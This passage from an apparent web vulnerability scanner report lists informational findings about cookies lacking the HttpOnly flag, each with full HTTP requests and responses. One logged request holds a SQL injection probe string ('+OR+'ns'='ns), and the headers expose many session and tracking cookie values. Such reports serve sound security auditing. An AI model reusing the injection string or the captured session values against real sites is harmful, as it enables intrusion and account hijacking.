Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"665304316906-758526689838","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
15.181. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a868; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:34 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:51:34 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:36:34 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776594; path=/; expires=Sat, 02-Apr-11 20:36:34 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173594|16768^1301171786^1301173594; path=/; expires=Sat, 26-Mar-11 21:06:34 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:36:34 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:0cd73208ac57a723a07d874a21de8895,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:36:34 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:36:34 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:36:34 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...
15.182. http://tags.bluekai.com/site/3200  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3200

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3200 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99W4pVANemJaB; bko=KJ0ETt5Qi9pF2ZPADmKaLVjy1pOGQaZEtOQRdr2FXmPiu9Evzrho9/o8yNkSw9y1t47PFAy1YUYVJOIWhzRQYtPh1vQY54OFpxuSzQ4/T7EwXsPk99YlVCK2; bkw5=KJhNAM+n9NWxCz2rBJ+5W06NX5WoWoYxWcWETtb1s1x0MSHV6y7SvPQJxHsYkxoVPFbYRYZR0+nvHkYy6LolAaEm4jCfQbES0lhpjLf1f1DAQBQ0cw31TuWOsnY53N1QsvKx/XQG7MHiJjMs8SxwXtka3Axv5QAlHv/TTbHkkbF5um6mKWNuYWPXsDYWwRZzOcT0yWWvYW707PJj9ItLDOSGDul/0iwyUac8F9kzEomY0vlaRk8sAmcOq3uX9T0fpv4nIhMR7QP1bFBssSvqTOZBdfZNLL/CXhsEeol/lGuOKaq1yziD2k8kYk7nxL/U+5TgynosKosD8/w/Oi4Y7TZYgdSy3VkLkYU8J1tVoQkQHH/t6bbZYVnJP2mRm4/jarxbolq4lfcfCASzBZW2fI4DfKvKtA06Fj7MiGssJdbvxhwGx5N71fPL78nWOKFzDPa32Jlr8TcvD9kgwwSzah5A0Af0GosjC4dPZrsM+/ccHU/qv7slFpS05pT=; bkst=KJhMR5Mehx9WMfmf4PAR2Qwj/QpKcgGsDsO3RZkrqsoCSzk2G9WG4yQGgXJQAsvSSZCiZSvqjJHGGs+iRsZQZtH3kvogjQkuq8vz7s3zpmx11ZXoBymeB/mpGtry3b+aVoZc56Hy+ZIuDfhlGP2PPGiHKE3wKyjxsuXw9T1yQTZJrRsJ3SZorqsH3Ecxvs1EQIFZqDOomPTsOCTs28pAMYn4JW5elIYQDpv5xwsUFYeUZOZ7siVqZNFGoCZ7sr3SoOQRbP3AoCgosoAjo3xkZokRZOi7kOrPI9/9ji9lBx==; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101qSofdRa9WR7O5T=; bk=MnD5YhZZUJJh4f95; bkc=KJh5NP+LPaDDOrONog5ooXH3Fm9aPc3GFBYcAxCanjYSsOFshYQvhMutxBPD/YHPbDDfxvaNna8iDWOM4sQ4EYwaBYUH/rJGxCxEUyyX/HVY3m7WVAi2Jvnd4p3gL25Imj1FI44SKbdjI8hL/eJ0i6M4prtoZWh+pzvcwE2PUwYHYosEUToLUJrO36FGx8fFYv68UotraakTK095wSIkirHmGEK2n1q132Iwi4pVvU/4MvPWd3fVIoH7Mkz4ydpaVjWnqxUlnqJZUFNwrzic10/q7iCTlt7goQfgej8UlPpyxE03Lq2shy5F+efQZK+o5m325e3xJUO182LMhQtKctr0qgpJIkqwkl3LHpjqzpl3nwoPiUfssZqUH2z7gJkUn8y7L78h/O1qVNnaL70/73yHRIqPs5uSvQrA+fDgPugFN5sdKtjKwRp8HA5aEZOXUOTjomd5RXtXrCyId38/Nzd264gGEqr+Nbu+ISrmGhXdG78rw/NI7ntBlFZi55Gp8N5wRFtE8Razl2DU2jBZdNypgXfOmKxdbm0n8LdkXbbjPXdedqkSazij8UF7dsKoB4w3pUQ1UuFu7ZhcdXIFoxz21b2IwrdrL58Gdn2k/Zsg0BcHQ3L21bdI9F6LhdkJ7WMwI5rkNL0g8IBXd/OnWEdsdkPad3PaMcLXwpe4Zr455qeRNCww7aX2Qw8KhFZqco25epl+ZUANMgqDTfb4fmMYIIrdsIMcvbpUKKjT5xnpCXk9MCfFMrgH5qVO7wrXsILoiMyHV328PRhjEdNvUvHAuu9nS+FCdo9ILAt1elFZKeUgnDgmpL4Njc9GfX4IogOK5UvoB447ZFUDqUMAgL155epoZUkNOKq4lho/tfSY52DWzCzzyXtApTUVf/5gNkmwTp8IM45NyFaU73wp8Ty4rcrtwr44URG2wR72qYlTTRHN+BIXOleIabO4EbKloXGAV6mFqgJK8j7MNKXDiUurhJN8XBkDixyIH1z2E2PjUdEXNMlVqlgZ4vTFTd8K1dRzpZmZQjftd/47FIGvdQMFkpuIfhBU5bOdbywbnnT7g3wl45TMXafAp65IBenpgokUeXmfAwXqj7IcXl7UpvLdQ4rHFIYRK54H2pdFMIaK8n2lpnhg8+PMX9e0gp+ZlMUpbk2h7+RBO4JYLMNbF2m4jLuRK4DVeYgY2IMuE0NyzdtVdwNxeIcLgRycDG7dMdUoajbjPX5x4yqljlP5X80FKeTEVF1IrVR22xptBf1dABehsXrLETUVgmKS25HUT1EqQU0tGr9vpdrVVUXEVgmIS2jUPtc2OpeIZSoZ7Bz5AuIsNCpFZrwPdymh06LT

Response

HTTP/1.0 200 OK
Date: Sat, 26 Mar 2011 20:36:20 GMT
Set-Cookie: bklc=4d8e4e44; expires=Mon, 28-Mar-2011 20:36:20 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=/yCSYOZZUJJh4f95; expires=Thu, 22-Sep-2011 20:36:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5Nk+LPaDDOrONog5ooXEHK1WnSmiCXA/4Hi/1SGcDhBQyJAjH1vShOS3Z9isouidS9x3++UiJxDs1XSa21/6D68HWiTMPCYQZFCCTxiGWD5mJ+jY3Jvnd4p3gL25IZKjndgltw3+g78kLozMYmyBoblG2D0hUWNkT60+idcHhyKmO0wO+/M6f+t5i1gVPwr0jK4VHYosEUTkLUBLcP8UxflrIvfEZKFDc1jc4t6UrhdTGn4ElB5S7wcm2ICM3aRInUsQorsKHB4w33IDicXt/qci0Tct7gHFSge5TU7Pgyx4hDRPINMLIKnwN9zXXEfNEfIUEQu0ORfg4cMsrXdhTQlU2n5SlKffDjEtXtjg7DRIMU8UGjbhr27h6qzvSK4UYKungayz0LqWJXfBXAJbLaZwZNUtGBPDVuc5pHbjDe3UowpypghfY4i1M/iKywibwe+elfqaZUk6mcl2wJwknqlxIK+BrbpPjSd8Ph2sw7N9dB8jawXfKxK2X0EggZ4rgJlcI04J9qrpGi4oJLlIrZP47TOp0cfqlHwF7X77UpvF7Tq8Kuyj0jF7Km42PSLtXKM1IO3XUSDtNGFd7N2/e7okUF8Ol8tCl+wf41osyVKEGu1aP7okU4TkIkZBIWiK0zd8r3EUpbFZRMh2hvKnctn2A8aIqhnMnXTwpgE7FgGwa+o8T8Ff34FEl1rjFKZptwwu6jIqPsstohU6dt5SHvjndq3v43nOK887gNx7LcbRYmU3X1bocotLYm45aJX8EacAi+afpZCip7FgPrWMJAA9VNnEYFua2jJLRcdq12VgVV8uSlRd7bzBxwGe7ZXJ8NSZkN7yINb07qLacfQqzxzKE7okUPteddztO+sygKa5N/c4e15h1IkhGpUbTjMlNsmfMBlC4JhhdfEZSwt52dptp2q7dfk/X6NBT736aw8vyMoTlflf1dyn6b87L2A0jMa4E3hrLPl7ZKFVfHun+vla7c7GrD0/ee2BhpNBobTrKlffUIilwl1dNj5p4b6S4hpptN5cE7Fd6dcKbT/dh4L7i2XEW+HlGld39wGFFW24HIpfFRUQFXrzMwhSjK5413T4QUzMd9fmdxdZXSIqP7Xv20a2ypnpgbwLdf6dQqrHdz10XSIqPGl9dXZXTj+TNXIg41WdgOQB815DSF5dopdgWZc7Naiy3yF4HojIqT1qSn47fGHfWfvt1ONvJdhdg60LX1bImG4T1fLd35mmzglQIWNgpwgkZw4D17Z2Z40YCTpKUVjXvgP7wBKrogXYJ5yn84WUOajflnqwIBgHZ45KLg6fid9Kyd+kA/IjNHIunGEUUrIjb242w1Dl7; expires=Thu, 22-Sep-2011 20:36:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 27-Mar-2011 20:36:20 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
15.183. http://technet.microsoft.com/security/ff852094.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /security/ff852094.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/ff852094.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/technet/security/bulletin/alertus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092958107:ss=1301092848759

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/security/ff852094.aspx
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:28 GMT
Content-Length: 146

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/security/ff852094.aspx">here</a>.</h2>
</body></html>
15.184. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=zbygse58m0&tz=5&ref=&page=http%3A%2F%2Fwww.insideup.com%2Fppc%2Fleadflow%2Fhins00%2Fleadflow%2Fhins00%2Fproject.php%3FcatId%3D'%2BOR%2B'ns'%253d'ns%26iusrc%3D3&uuid=0291FF4C-46CC-491C-85AD-35386C724DCE&rnd=1600410261 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=0291FF4C-46CC-491C-85AD-35386C724DCE

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Fri, 25 Mar 2011 19:15:59 GMT
Connection: close
Set-Cookie: _msuuid=0291FF4C-46CC-491C-85AD-35386C724DCE; Domain=marinsm.com; Expires=Sat, 24-Mar-2012 19:15:59 GMT; Path=/

GIF89a.............,...........D..;
15.185. http://www.fast-report.com/bitrix/redirect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bitrix/redirect.php?event1=shareit_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A//secure.shareit.com/shareit/checkout.html%3FPRODUCT%5B300261966%5D%3D1%26HADD%5B300261966%5D%5BADDITIONAL1%5D%3D%23EVENT_GID%23%26hidecoupon%3D1 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A45

Response

HTTP/1.1 302 Found
Date: Sat, 26 Mar 2011 16:30:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:53 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A53; expires=Tue, 20-Mar-2012 16:30:53 GMT; path=/
Request-URI: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Content-Location: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Location: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 0

15.186. http://www.fast-report.com/bitrix/redirect2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:48 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A48; expires=Tue, 20-Mar-2012 16:30:48 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 363

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input typ
...[SNIP]...
15.187. http://www.fast-report.com/en/buy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/buy/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; expires=Tue, 05-Apr-2011 11:41:20 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A21; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 18472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
15.188. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/order-FASTREPORT.NET.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
